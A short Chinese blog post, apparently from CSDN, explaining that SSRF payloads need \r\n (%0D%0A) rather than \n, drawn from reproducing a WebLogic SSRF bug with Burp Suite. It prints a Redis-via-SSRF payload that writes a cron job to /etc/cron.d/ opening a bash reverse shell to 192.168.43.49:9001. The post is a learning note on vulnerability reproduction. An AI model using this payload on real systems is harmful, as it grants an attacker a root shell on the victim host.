\r\n是我们需要的换行字符,\r代表回车,\n代表换行
\r就是回到行首,\n就是到下一行的,但是一般我们输出程序时,看不到明显的差别的。通常用的Enter是两个加起来
\r\n与\n是有区别的 如果要通用的则是\r\n,因为有些编辑器它不认\nLink: https://blog.csdn.net/qq_39118371/article/details/127526198
\r\n的URL编码结果是%0D%0A
在一次复现weblogic SSRF漏洞使用Burpsuite发payload的时候发现一个问题,使用自己url编码器编码的payload无法成功,使用网上教程的payload可以。于是我对比了一下两个的区别,居然是缺少了\r,payload中需要使用\r\n。我感觉这个是老生长谈的问题,之前也遇到过,但是很久远了,于是这次把它记录下来。(de这个bug居然折腾我一天)
payload对比
需要执行的payload编码前是
1
2
3
4
5
6
7
8
test
set 1 "\n\n\n\n* * * * * root bash -c 'sh -i >& /dev/tcp/192.168.43.49/9001 0>&1'\n\n\n\n"
config set dir /etc/cron.d/
config set dbfilename nopwn
save
aaa
如果直接丢入编码器编码会把换行编码为\n,不是我们要的\r\n。
不同的payload发送出去的对比
错误的结果:
正确的结果:
注:这个问题,虽然简单,但是需要注意,很容易因为这种小错误导致debug半天。还是需要多多练习
